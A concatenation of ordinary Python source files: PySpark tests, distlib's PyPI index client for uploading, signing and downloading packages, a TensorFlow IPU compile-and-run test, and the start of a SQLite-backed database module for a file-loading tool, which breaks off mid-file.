self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out)
class ContextStopTests(unittest.TestCase):
def test_stop(self):
sc = SparkContext()
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_with(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_exception(self):
try:
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
raise Exception()
except:
pass
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_stop(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
@unittest.skipIf(not _have_scipy, "SciPy not installed")
class SciPyTests(PySparkTestCase):
"""General PySpark tests that depend on scipy """
def test_serialize(self):
from scipy.special import gammaln
x = range(1, 5)
expected = map(gammaln, x)
observed = self.sc.parallelize(x).map(gammaln).collect()
self.assertEqual(expected, observed)
@unittest.skipIf(not _have_numpy, "NumPy not installed")
class NumPyTests(PySparkTestCase):
"""General PySpark tests that depend on numpy """
def test_statcounter_array(self):
x = self.sc.parallelize([np.array([1.0, 1.0]), np.array([2.0, 2.0]), np.array([3.0, 3.0])])
s = x.stats()
self.assertSequenceEqual([2.0, 2.0], s.mean().tolist())
self.assertSequenceEqual([1.0, 1.0], s.min().tolist())
self.assertSequenceEqual([3.0, 3.0], s.max().tolist())
self.assertSequenceEqual([1.0, 1.0], s.sampleStdev().tolist())
if __name__ == "__main__":
if not _have_scipy:
print "NOTE: Skipping SciPy tests as it does not seem to be installed"
if not _have_numpy:
print "NOTE: Skipping NumPy tests as it does not seem to be installed"
unittest.main()
if not _have_scipy:
print "NOTE: SciPy tests were skipped as it does not seem to be installed"
if not _have_numpy:
print "NOTE: NumPy tests were skipped as it does not seem to be installed"
|
index.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import hashlib
import logging
import os
import shutil
import subprocess
import tempfile
try:
from threading import Thread
except ImportError:
from dummy_threading import Thread
from . import DistlibException
from .compat import (HTTPBasicAuthHandler, Request, HTTPPasswordMgr,
urlparse, build_opener, string_types)
from .util import zip_dir, ServerProxy
logger = logging.getLogger(__name__)
DEFAULT_INDEX = 'https://pypi.org/pypi'
DEFAULT_REALM = 'pypi'
class PackageIndex(object):
"""
This class represents a package index compatible with PyPI, the Python
Package Index.
"""
boundary = b'----------ThIs_Is_tHe_distlib_index_bouNdaRY_$'
def __init__(self, url=None):
"""
Initialise an instance.
:param url: The URL of the index. If not specified, the URL for PyPI is
used.
"""
self.url = url or DEFAULT_INDEX
self.read_configuration()
scheme, netloc, path, params, query, frag = urlparse(self.url)
if params or query or frag or scheme not in ('http', 'https'):
raise DistlibException('invalid repository: %s' % self.url)
self.password_handler = None
self.ssl_verifier = None
self.gpg = None
self.gpg_home = None
with open(os.devnull, 'w') as sink:
# Use gpg by default rather than gpg2, as gpg2 insists on
# prompting for passwords
for s in ('gpg', 'gpg2'):
try:
rc = subprocess.check_call([s, '--version'], stdout=sink,
stderr=sink)
if rc == 0:
self.gpg = s
break
except OSError:
pass
def _get_pypirc_command(self):
"""
Get the distutils command for interacting with PyPI configurations.
:return: the command.
"""
from .util import _get_pypirc_command as cmd
return cmd()
def read_configuration(self):
"""
Read the PyPI access configuration as supported by distutils. This populates
``username``, ``password``, ``realm`` and ``url`` attributes from the
configuration.
"""
from .util import _load_pypirc
cfg = _load_pypirc(self)
self.username = cfg.get('username')
self.password = cfg.get('password')
self.realm = cfg.get('realm', 'pypi')
self.url = cfg.get('repository', self.url)
def save_configuration(self):
"""
Save the PyPI access configuration. You must have set ``username`` and
``password`` attributes before calling this method.
"""
self.check_credentials()
from .util import _store_pypirc
_store_pypirc(self)
def check_credentials(self):
"""
Check that ``username`` and ``password`` have been set, and raise an
exception if not.
"""
if self.username is None or self.password is None:
raise DistlibException('username and password must be set')
pm = HTTPPasswordMgr()
_, netloc, _, _, _, _ = urlparse(self.url)
pm.add_password(self.realm, netloc, self.username, self.password)
self.password_handler = HTTPBasicAuthHandler(pm)
def register(self, metadata):
"""
Register a distribution on PyPI, using the provided metadata.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the distribution to be
registered.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
metadata.validate()
d = metadata.todict()
d[':action'] = 'verify'
request = self.encode_request(d.items(), [])
response = self.send_request(request)
d[':action'] = 'submit'
request = self.encode_request(d.items(), [])
return self.send_request(request)
def _reader(self, name, stream, outbuf):
"""
Thread runner for reading lines from a subprocess into a buffer.
:param name: The logical name of the stream (used for logging only).
:param stream: The stream to read from. This will typically be a pipe
connected to the output stream of a subprocess.
:param outbuf: The list to append the read lines to.
"""
while True:
s = stream.readline()
if not s:
break
s = s.decode('utf-8').rstrip()
outbuf.append(s)
logger.debug('%s: %s' % (name, s))
stream.close()
def get_sign_command(self, filename, signer, sign_password,
keystore=None):
"""
Return a suitable command for signing a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The signing command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
if sign_password is not None:
cmd.extend(['--batch', '--passphrase-fd', '0'])
td = tempfile.mkdtemp()
sf = os.path.join(td, os.path.basename(filename) + '.asc')
cmd.extend(['--detach-sign', '--armor', '--local-user',
signer, '--output', sf, filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd, sf
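# Illustrative sketch of the command built above (hypothetical names, no
# keystore, passphrase supplied): for filename='pkg-1.0.tar.gz' and
# signer='alice', get_sign_command() returns roughly
#   (['gpg', '--status-fd', '2', '--no-tty', '--batch', '--passphrase-fd', '0',
#     '--detach-sign', '--armor', '--local-user', 'alice',
#     '--output', '<tmpdir>/pkg-1.0.tar.gz.asc', 'pkg-1.0.tar.gz'],
#    '<tmpdir>/pkg-1.0.tar.gz.asc')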
def run_command(self, cmd, input_data=None):
"""
Run a command in a child process, passing it any input data specified.
:param cmd: The command to run.
:param input_data: If specified, this must be a byte string containing
data to be sent to the child process.
:return: A tuple consisting of the subprocess' exit code, a list of
lines read from the subprocess' ``stdout``, and a list of
lines read from the subprocess' ``stderr``.
"""
kwargs = {
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
}
if input_data is not None:
kwargs['stdin'] = subprocess.PIPE
stdout = []
stderr = []
p = subprocess.Popen(cmd, **kwargs)
# We don't use communicate() here because we may need to
# get clever with interacting with the command
t1 = Thread(target=self._reader, args=('stdout', p.stdout, stdout))
t1.start()
t2 = Thread(target=self._reader, args=('stderr', p.stderr, stderr))
t2.start()
if input_data is not None:
p.stdin.write(input_data)
p.stdin.close()
p.wait()
t1.join()
t2.join()
return p.returncode, stdout, stderr
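# Minimal usage sketch (assumes `index` is a PackageIndex instance and gpg is
# installed):
#   rc, out, err = index.run_command(['gpg', '--version'])
# `out` and `err` are lists of decoded, stripped lines read from the child
# process by the reader threads above.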
def sign_file(self, filename, signer, sign_password, keystore=None):
"""
Sign a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The absolute pathname of the file where the signature is
stored.
"""
cmd, sig_file = self.get_sign_command(filename, signer, sign_password,
keystore)
rc, stdout, stderr = self.run_command(cmd,
sign_password.encode('utf-8'))
if rc != 0:
raise DistlibException('sign command failed with error '
'code %s' % rc)
return sig_file
def upload_file(self, metadata, filename, signer=None, sign_password=None,
filetype='sdist', pyversion='source', keystore=None):
"""
Upload a release file to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the file to be uploaded.
:param filename: The pathname of the file to be uploaded.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param filetype: The type of the file being uploaded. This is the
distutils command which produced that file, e.g.
``sdist`` or ``bdist_wheel``.
:param pyversion: The version of Python which the release relates
to. For code compatible with any Python, this would
be ``source``, otherwise it would be e.g. ``3.2``.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.exists(filename):
raise DistlibException('not found: %s' % filename)
metadata.validate()
d = metadata.todict()
sig_file = None
if signer:
if not self.gpg:
logger.warning('no signing program available - not signed')
else:
sig_file = self.sign_file(filename, signer, sign_password,
keystore)
with open(filename, 'rb') as f:
file_data = f.read()
md5_digest = hashlib.md5(file_data).hexdigest()
sha256_digest = hashlib.sha256(file_data).hexdigest()
d.update({
':action': 'file_upload',
'protocol_version': '1',
'filetype': filetype,
'pyversion': pyversion,
'md5_digest': md5_digest,
'sha256_digest': sha256_digest,
})
files = [('content', os.path.basename(filename), file_data)]
if sig_file:
with open(sig_file, 'rb') as f:
sig_data = f.read()
files.append(('gpg_signature', os.path.basename(sig_file),
sig_data))
shutil.rmtree(os.path.dirname(sig_file))
request = self.encode_request(d.items(), files)
return self.send_request(request)
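# Minimal usage sketch (hypothetical paths; assumes `md` is a Metadata instance
# with at least a name and version, and that credentials are configured):
#   index = PackageIndex()
#   response = index.upload_file(md, 'dist/pkg-1.0.tar.gz',
#                                filetype='sdist', pyversion='source')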
def upload_documentation(self, metadata, doc_dir):
"""
Upload documentation to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the documentation to be
uploaded.
:param doc_dir: The pathname of the directory which contains the
documentation. This should be the directory that
contains the ``index.templates`` for the documentation.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.isdir(doc_dir):
raise DistlibException('not a directory: %r' % doc_dir)
fn = os.path.join(doc_dir, 'index.templates')
if not os.path.exists(fn):
raise DistlibException('not found: %r' % fn)
metadata.validate()
name, version = metadata.name, metadata.version
zip_data = zip_dir(doc_dir).getvalue()
fields = [(':action', 'doc_upload'),
('name', name), ('version', version)]
files = [('content', name, zip_data)]
request = self.encode_request(fields, files)
return self.send_request(request)
def get_verify_command(self, signature_filename, data_filename,
keystore=None):
"""
Return a suitable command for verifying a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The verifying command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
cmd.extend(['--verify', signature_filename, data_filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd
def verify_signature(self, signature_filename, data_filename,
keystore=None):
"""
Verify a signature for a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: True if the signature was verified, else False.
"""
if not self.gpg:
raise DistlibException('verification unavailable because gpg '
'unavailable')
cmd = self.get_verify_command(signature_filename, data_filename,
keystore)
rc, stdout, stderr = self.run_command(cmd)
if rc not in (0, 1):
raise DistlibException('verify command failed with error '
'code %s' % rc)
return rc == 0
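# Minimal usage sketch (hypothetical file names; assumes `index` is a
# PackageIndex instance):
#   ok = index.verify_signature('pkg-1.0.tar.gz.asc', 'pkg-1.0.tar.gz',
#                               keystore='/path/to/keyring')
# `ok` is True only when gpg exits with status 0; a missing gpg binary raises
# DistlibException instead.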
def download_file(self, url, destfile, digest=None, reporthook=None):
"""
This is a convenience method for downloading a file from a URL.
Normally, this will be a file from the index, though currently
no check is made for this (i.e. a file can be downloaded from
anywhere).
The method is just like the :func:`urlretrieve` function in the
standard library, except that it allows digest computation to be
done during download and checking that the downloaded data
matches any expected value.
:param url: The URL of the file to be downloaded (assumed to be
available via an HTTP GET request).
:param destfile: The pathname where the downloaded file is to be
saved.
:param digest: If specified, this must be a (hasher, value)
tuple, where hasher is the algorithm used (e.g.
``'md5'``) and ``value`` is the expected value.
:param reporthook: The same as for :func:`urlretrieve` in the
standard library.
"""
if digest is None:
digester = None
logger.debug('No digest specified')
else:
if isinstance(digest, (list, tuple)):
hasher, digest = digest
else:
hasher = 'md5'
digester = getattr(hashlib, hasher)()
logger.debug('Digest specified: %s' % digest)
# The following code is equivalent to urlretrieve.
# We need to do it this way so that we can compute the
# digest of the file as we go.
with open(destfile, 'wb') as dfp:
# addinfourl is not a context manager on 2.x
# so we have to use try/finally
sfp = self.send_request(Request(url))
try:
headers = sfp.info()
blocksize = 8192
size = -1
read = 0
blocknum = 0
if "content-length" in headers:
size = int(headers["Content-Length"])
if reporthook:
reporthook(blocknum, blocksize, size)
while True:
block = sfp.read(blocksize)
if not block:
break
read += len(block)
dfp.write(block)
if digester:
digester.update(block)
blocknum += 1
if reporthook:
reporthook(blocknum, blocksize, size)
finally:
sfp.close()
# check that we got the whole file, if we can
if size >= 0 and read < size:
raise DistlibException(
'retrieval incomplete: got only %d out of %d bytes'
% (read, size))
# if we have a digest, it must match.
if digester:
actual = digester.hexdigest()
if digest != actual:
raise DistlibException('%s digest mismatch for %s: expected '
'%s, got %s' % (hasher, destfile,
digest, actual))
logger.debug('Digest verified: %s', digest)
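# Minimal usage sketch (hypothetical URL and digest): pass digest as a
# (hasher, value) tuple to have the download verified as it streams:
#   index.download_file('https://example.com/pkg-1.0.tar.gz',
#                       '/tmp/pkg-1.0.tar.gz', digest=('sha256', expected_hex))
# A bare string digest is treated as an md5 hex value.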
def send_request(self, req):
"""
Send a standard library :class:`Request` to PyPI and return its
response.
:param req: The request to send.
:return: The HTTP response from PyPI (a standard library HTTPResponse).
"""
handlers = []
if self.password_handler:
handlers.append(self.password_handler)
if self.ssl_verifier:
handlers.append(self.ssl_verifier)
opener = build_opener(*handlers)
return opener.open(req)
def encode_request(self, fields, files):
"""
Encode fields and files for posting to an HTTP server.
:param fields: The fields to send as a list of (fieldname, value)
tuples.
:param files: The files to send as a list of (fieldname, filename,
file_bytes) tuples.
"""
# Adapted from packaging, which in turn was adapted from
# http://code.activestate.com/recipes/146306
parts = []
boundary = self.boundary
for k, values in fields:
if not isinstance(values, (list, tuple)):
values = [values]
for v in values:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"' %
k).encode('utf-8'),
b'',
v.encode('utf-8')))
for key, filename, value in files:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"; filename="%s"' %
(key, filename)).encode('utf-8'),
b'',
value))
parts.extend((b'--' + boundary + b'--', b''))
body = b'\r\n'.join(parts)
ct = b'multipart/form-data; boundary=' + boundary
headers = {
'Content-type': ct,
'Content-length': str(len(body))
}
return Request(self.url, body, headers)
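    # A minimal usage sketch (not part of the original source): the field and
    # file values are hypothetical, and `index` stands for an instance of this
    # class whose `url` and `boundary` were set up by its constructor.
    #
    #   req = index.encode_request(
    #       [(':action', 'file_upload'), ('name', 'foo')],        # fields
    #       [('content', 'foo-1.0.tar.gz', b'<archive bytes>')],  # files
    #   )
    #   response = index.send_request(req)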
def search(self, terms, operator=None):
if isinstance(terms, string_types):
terms = {'name': terms}
rpc_proxy = ServerProxy(self.url, timeout=3.0)
try:
return rpc_proxy.search(terms, operator or 'and')
finally:
rpc_proxy('close')()
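    # A minimal usage sketch (not part of the original source): `index` stands
    # for an instance of this class pointed at an XML-RPC-capable index.
    #
    #   hits = index.search('requests')                          # by name
    #   hits = index.search({'summary': 'HTTP'}, operator='or')  # by field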
|
application_compile_and_run_test.py
|
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import multiprocessing
import os
import tempfile
import numpy as np
from tensorflow.compiler.plugin.poplar.tests import test_utils as tu
from tensorflow.python.client import session
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import test_util
from tensorflow.python.ipu import ipu_infeed_queue
from tensorflow.python.ipu import ipu_outfeed_queue
from tensorflow.python.ipu import loops
from tensorflow.python.ipu import config
from tensorflow.python.ipu.ops import application_compile_op
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
from tensorflow.python.ipu import embedded_runtime
class TestApplicationCompileInProcess(test_util.TensorFlowTestCase):
@tu.test_uses_ipus(num_ipus=2)
@test_util.deprecated_graph_mode_only
def test_from_cache(self):
with tempfile.TemporaryDirectory() as tmp_folder:
def inner_process(pid):
# Set up a cache - executable will be re-used between the processes.
os.environ["TF_POPLAR_FLAGS"] = \
f"--executable_cache_path={tmp_folder} " \
+ os.environ.get("TF_POPLAR_FLAGS", "")
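        # For illustration (not in the original test): with a hypothetical
        # tmp_folder of '/tmp/cache' and no pre-existing flags, this sets
        # TF_POPLAR_FLAGS to "--executable_cache_path=/tmp/cache ", so both
        # child processes share the same executable cache directory.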
cfg = config.IPUConfig()
cfg.auto_select_ipus = 1
tu.add_hw_ci_connection_options(cfg)
cfg.configure_ipu_system()
with session.Session() as sess:
dataset = dataset_ops.Dataset.from_tensor_slices(
np.ones(10, dtype=np.float32))
infeed_queue = ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu_outfeed_queue.IPUOutfeedQueue()
def body(x):
outfed = outfeed_queue.enqueue(x * x)
return outfed
def my_net():
return loops.repeat(2, body, [], infeed_queue)
result = application_compile_op.experimental_application_compile_op(
              my_net, output_path=f"{tmp_folder}/{pid}.poplar_exec")
compiled_path = sess.run(result)
config.reset_ipu_configuration()
engine_name = f'engine_{self.id()}{pid}'
ctx = embedded_runtime.embedded_runtime_start(compiled_path, [],
engine_name)
input_data = array_ops.placeholder(np.float32, shape=[])
result = embedded_runtime.embedded_runtime_call([input_data], ctx)
with session.Session() as sess:
res = sess.run(result, {input_data: 2.})
self.assertEqual(res, [4.])
processes = []
for i in range(2):
processes.append(
multiprocessing.Process(target=inner_process, args=[i]))
processes[-1].start()
for process in processes:
process.join()
self.assertEqual(process.exitcode, 0)
if __name__ == "__main__":
test.main()
|
db.py
|
#
# clfsload/db.py
#
#-------------------------------------------------------------------------
# Copyright (c) Microsoft. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#--------------------------------------------------------------------------
'''
A note about hard links: During the transfer phase, any object
upserted with nlink=1 is not eligible to have backpointers added.
Among other things, the update fastpaths assume this. Any code
is free to assume that any object with nlink=1 during the transfer
phase will never legitimately gain extra links.
'''
import collections
import enum
import json
import logging
import os
import pprint
import sqlite3
import threading
import time
import sqlalchemy
from sqlalchemy import event
from sqlalchemy.engine import Engine
from sqlalchemy.orm.query import Query
from sqlalchemy.orm.session import Session
from clfsload.stypes import AbortException, AdditionalBackpointers, BackpointerLimitReached, \
CLFS_LINK_MAX, CLFSLoadThread, DATA_FTYPES, \
DbEntBase, DbEntAdditionalBackpointerMapEnt, DbEntMeta, DbEntTargetObj, \
DBStats, DbEntMetaKey, DbInconsistencyError, DbTerminalError,\
DryRunResult, ExistingTargetObjKeyBarrier, \
FILEHANDLE_NULL_BYTES, Filehandle, Ftype, Phase, \
SimpleError, TargetObjState, \
TerminalError, TargetObj, TimerStats
from clfsload.util import Monitor, Size, \
current_thread_name, \
elapsed, exc_info_err, exc_log, exc_stack, getframe, notify_all
_CACHE_SIZE = Size.GB
_JOURNAL_MODE = 'WAL'
_MMAP_SIZE = 4 * Size.GB
_PAGE_SIZE = 16 * Size.KB
@event.listens_for(Engine, "connect")
def _connect__set_sqlite_pragma(dbapi_connection, connection_record): # pylint: disable=unused-argument
'''
See:
https://docs.sqlalchemy.org/en/13/dialects/sqlite.html
https://sqlite.org/pragma.html
'''
cursor = None
try:
cursor = dbapi_connection.cursor()
cursor.execute("PRAGMA cache_size=%d;" % _CACHE_SIZE)
cursor.execute("PRAGMA journal_mode=%s;" % _JOURNAL_MODE)
cursor.execute("PRAGMA mmap_size=%d;" % _MMAP_SIZE)
# page_size handled in _DBSessionWrapper.__init__
finally:
if cursor:
cursor.close()
class ClfsLoadDB():
'''
This class handles the database-level interactions for CLFSLoad.
This uses SQLAlchemy with SQLite for the backend.
To reduce performance impact, this object maintains a partial
cache of TargetObj rows in various states.
Method naming:
db_*: Direct database access. Time-consuming.
dbc_*: Cached database access. Faster.
While worker phases are executing, only dbc accesses read and modify
DbEntTargetObj. This allows aggressive caching and prefetching/preclaiming.
The metastore and the target object table are not only different
tables, they are stored as entirely separate databases to eliminate
locking conflicts between sessions (transactions). Otherwise,
we get false sharing conflicts between allocating new filehandle
ranges and flushing target object batches.
'''
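    # Illustration of the naming convention above (not part of the original
    # source): db_meta_get() and db_count_in_state() issue blocking SQL
    # queries directly, while dbc_claim() and dbc_upsert_single() operate on
    # the in-memory TargetObj cache and only reach SQLite when the background
    # toc thread flushes a batch.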
def __init__(self, thread_shared_state, dirname, logger, file_cleaner, toc_lock=None, db_preclaim_state_class=None):
self._thread_shared_state = thread_shared_state
self._dirname = dirname
self._logger = logger
self.file_cleaner = file_cleaner
db_preclaim_state_class = db_preclaim_state_class if db_preclaim_state_class else PreclaimState
self._phase = None
self.phase_terminal_states = tuple()
self.dbmeta = _DBSessionWrapper(logger, os.path.join(self._dirname, 'meta.db'))
self.dbtobj = _DBSessionWrapper(logger, os.path.join(self._dirname, 'target.db'))
self._dbws = [self.dbmeta, self.dbtobj]
self.dr_init = None # progress at start/resume
self.dr_current = None # current total progress
self.dr_input = None # dry run parameters
self.progress_wrote_last_count = None
self.progress_wrote_last_gb = None
self._bkg_threadstates = list()
self._is_consistent = True
self._terminal_error = ''
self._terminal_error_lock = threading.RLock()
# Public names to simplify sharing with BackgroundThreadStateFhseq
self.fhseq_lock = threading.RLock()
self.fhseq_run_cond = threading.Condition(lock=self.fhseq_lock)
self.fhseq_get_cond = threading.Condition(lock=self.fhseq_lock)
self.fhseq_prev = None # most recent value returned from dbc_fhseq_get()
self.fhseq_dbval = None # last value in the DB
self.fhseq_thread_state = self.BackgroundThreadStateFhseq(self._thread_shared_state, 'fhseq-refresh', self.fhseq_run_cond)
self._bkg_threadstates.append(self.fhseq_thread_state)
# Public names to simplify sharing with BackgroundThreadStateToc
# toc: TargetObj Cache
self.toc_lock = toc_lock if toc_lock else threading.RLock()
self.toc_run_cond = threading.Condition(lock=self.toc_lock)
self.toc_flush_cond = threading.Condition(lock=self.toc_lock)
self.toc_flushing = None # batch that is currently flushing
self.toc_idx_prev = 1 # Always start with a value > 0 to enable logic that waits for flushes
self.toc_idx_flushed_last = 0
self.toc_idx_flushed_and_work_remaining_last = 0
self.toc_flush_list = collections.deque()
self.toc_flush_morenondir_list = collections.deque()
self.toc_flush_moredir_list = collections.deque()
self.toc_buffering = self.TocBatch(self.toc_idx_prev)
self.toc_state_claim_from = None
self.toc_state_claim_to = tuple()
self.toc_thread_state = self.BackgroundThreadStateToc(self._thread_shared_state, 'toc', self.toc_run_cond)
self.toc_preclaim = db_preclaim_state_class(self._logger)
self.toc_flush_next_upsert = False
self.toc_idx_for_preclaim_last = 0
self._bkg_threadstates.append(self.toc_thread_state)
# Set of ExistingTargetObjKey for objects for which dbc_get_existing()
# has been called and dbc_upsert has not been called.
# Does not include non-DIR objects with nlink < 2.
        # Note: An alternate implementation could be to have upsert_existing_pending_dict
        # with ExistingTargetObjKey keys and threading.Condition values. Doing
        # that trades false wakeups for the expense of constructing
        # and destroying threading.Condition objects.
self.upsert_existing_pending_set = set()
self.upsert_existing_pending_cond = threading.Condition(lock=self.toc_lock)
# phase_work_poke: invoked as phase_work_poked(num) where num is a number
# of work items now available.
self.phase_work_poke = self._noop
# phase_threads_are_idle: hint from the core that worker threads
# are sitting around doing nothing
self._all_phase_threads_are_idle = False
self._any_phase_threads_are_idle = False
self.timers = None
self.stats = None
self._stats_reset()
self.query_DbEntMeta = Query((DbEntMeta,))
self.query_DbEntTargetObj = Query((DbEntTargetObj,))
self.query_DbEntAdditionalBackpointerMapEnt = Query((DbEntAdditionalBackpointerMapEnt,))
def __str__(self):
return "%s(%s)" % (self.__class__.__name__, self._dirname)
def __repr__(self):
return "<%s,%s,%s>" % (self.__class__.__name__, hex(id(self)), self._dirname)
@staticmethod
def _noop(num):
pass
def check_usable(self):
if not self.should_run:
raise SystemExit(1)
if not self._is_consistent:
raise DbTerminalError("%s is inconsistent" % str(self))
if self._terminal_error:
raise DbTerminalError(self._terminal_error)
def raise_terminal(self, err, fromex=None):
'''
A terminal error is encountered. Raise and remember it.
'''
self.terminal_error = err.rstrip() + ' ' + getframe(1)
raise DbTerminalError(err) from fromex
@property
def logger(self):
return self._logger
@property
def should_run(self):
return self._thread_shared_state.should_run
@should_run.setter
def should_run(self, value):
self._thread_shared_state.should_run = value
@property
def is_consistent(self):
return self._is_consistent
@is_consistent.setter
def is_consistent(self, value):
with self._terminal_error_lock:
if value:
raise SimpleError("%s attempt to set is_consistent to %s %s" % (self, value.__class__.__name__, value))
if self._is_consistent:
self._logger.error("%s marking inconsistent", self)
self._is_consistent = False
if not self._terminal_error:
self._terminal_error = "database is inconsistent"
self._logger.error("%s DB terminal_error is now '%s'" % (self, self._terminal_error))
self._best_effort_wake_all()
@property
def phase(self):
return self._phase
@phase.setter
def phase(self, value):
if self._set_phase(value):
self.db_meta_set([(DbEntMetaKey.PHASE, self._phase)])
def _set_phase(self, value):
'''
Set self._phase = value.
Caller holds toc_lock.
Returns whether or not the phase changed.
'''
ret = False
with self.toc_lock:
prev_phase = self._phase
if prev_phase != value:
self.toc_idx_flushed_and_work_remaining_last = 0
self._stats_reset()
self.stats.stat_set('error_count_entity', self.db_count_in_state(TargetObjState.ERROR))
ret = True
self.check_usable()
if self.toc_flushing is not None:
self.raise_terminal("attempt to update phase while flushing")
if self.toc_buffering:
self.raise_terminal("attempt to update phase with unflushed updates")
self._phase = value
if self._phase == Phase.TRANSFER:
self.toc_state_claim_from = TargetObjState.PENDING
self.toc_state_claim_to = (TargetObjState.GENERATING, TargetObjState.WRITING)
elif self._phase == Phase.RECONCILE:
self.toc_preclaim.accepted_all_offers = False
self.toc_state_claim_from = TargetObjState.INODE_PENDING
self.toc_state_claim_to = (TargetObjState.INODE_WRITING,)
elif self._phase == Phase.CLEANUP:
self.toc_preclaim.accepted_all_offers = False
self.toc_state_claim_from = TargetObjState.INODE_CLEANUP_PENDING
self.toc_state_claim_to = (TargetObjState.INODE_CLEANUP_CLEANING,)
else:
self.toc_state_claim_from = None
self.toc_state_claim_to = tuple()
self.phase_work_poke = self._noop
self._all_phase_threads_are_idle = False
self._any_phase_threads_are_idle = False
self.toc_preclaim.phase = self._phase
self._logger.debug("DB internal phase is now %s", self._phase)
if self._phase == Phase.TRANSFER:
self.phase_terminal_states = (TargetObjState.INODE_PENDING, TargetObjState.DONE, TargetObjState.ERROR)
elif self._phase == Phase.RECONCILE:
self.phase_terminal_states = (TargetObjState.INODE_CLEANUP_PENDING, TargetObjState.ERROR)
elif self._phase == Phase.CLEANUP:
self.phase_terminal_states = (TargetObjState.DONE, TargetObjState.ERROR)
else:
self.phase_terminal_states = tuple()
return ret
@property
def all_phase_threads_are_idle(self):
return self._all_phase_threads_are_idle
@all_phase_threads_are_idle.setter
def all_phase_threads_are_idle(self, value):
with self.toc_lock:
self._all_phase_threads_are_idle = value
self.check_phase_idle_NL()
@property
def any_phase_threads_are_idle(self):
return self._any_phase_threads_are_idle
@any_phase_threads_are_idle.setter
def any_phase_threads_are_idle(self, value):
with self.toc_lock:
self._any_phase_threads_are_idle = value
self.check_phase_idle_NL()
def _best_effort_wake_all(self):
'''
Hacky way to wake up sleeping threads. Used when the DB becomes ill
to let waiters know to bail out. Not guaranteed to issue wakes.
Frustrating that Python Condition variables require locks held.
'''
with Monitor(self.toc_lock, blocking=False) as m:
if m.havelock:
self.toc_run_cond.notify_all()
self.toc_flush_cond.notify_all()
self.upsert_existing_pending_cond.notify_all()
with Monitor(self.fhseq_lock, blocking=False) as m:
if m.havelock:
self.fhseq_run_cond.notify_all()
self.fhseq_get_cond.notify_all()
self.phase_work_poke(0)
@property
def terminal_error(self):
return self._terminal_error
@terminal_error.setter
def terminal_error(self, value):
with self._terminal_error_lock:
if not value:
raise SimpleError("%s attempt to set terminal_error to something falsey (%s %s)" % (self, value.__class__.__name__, value))
# Latch and log the first terminal error
if not self._terminal_error:
self._terminal_error = value
if self._terminal_error != 'SystemExit':
self._logger.error("%s DB terminal_error is now '%s' thread='%s'" % (self, self._terminal_error, current_thread_name()))
self._best_effort_wake_all()
def _stats_reset(self):
'''
Reset stats and timers.
'''
self.timers = TimerStats()
self.timers.start_working()
self.stats = DBStats(lock=self.toc_lock)
def toc_queue_est(self, snap=False):
'''
Return a tuple of:
